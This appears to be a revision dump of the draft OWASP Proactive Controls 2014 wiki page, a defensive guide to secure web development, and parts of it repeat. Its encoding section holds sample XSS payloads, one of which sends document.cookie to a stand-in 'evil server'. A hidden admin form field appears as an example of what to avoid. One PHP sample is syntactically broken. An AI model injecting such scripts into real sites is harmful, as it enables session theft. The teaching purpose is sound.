<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
For more information on how to properly implement logging in an application, please see the [[Logging Cheat Sheet]].<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, forgot password or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of what personal and confidential information needs to be protected and tracked in the application. This will drive the need for access control, encryption and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
There are different areas where you need to be concerned about security in the architecture and design of a system:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls are enforced at the client, the web layer, the business layer, the data layer, and where you need to establish trust between different systems or different parts of the same system. Understand trust boundaries: what is inside or outside of a trust boundary, what actors or data can be trusted, what should not be? This determines where you need to make decisions about authentication, access control, data validation and encoding, encryption and logging.<br />
<br />
3) '''Understand the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (whether you should do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
For more information, see the [[Attack Surface Analysis Cheat Sheet]].<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=170112OWASP Proactive Controls2014-03-14T14:27:25Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
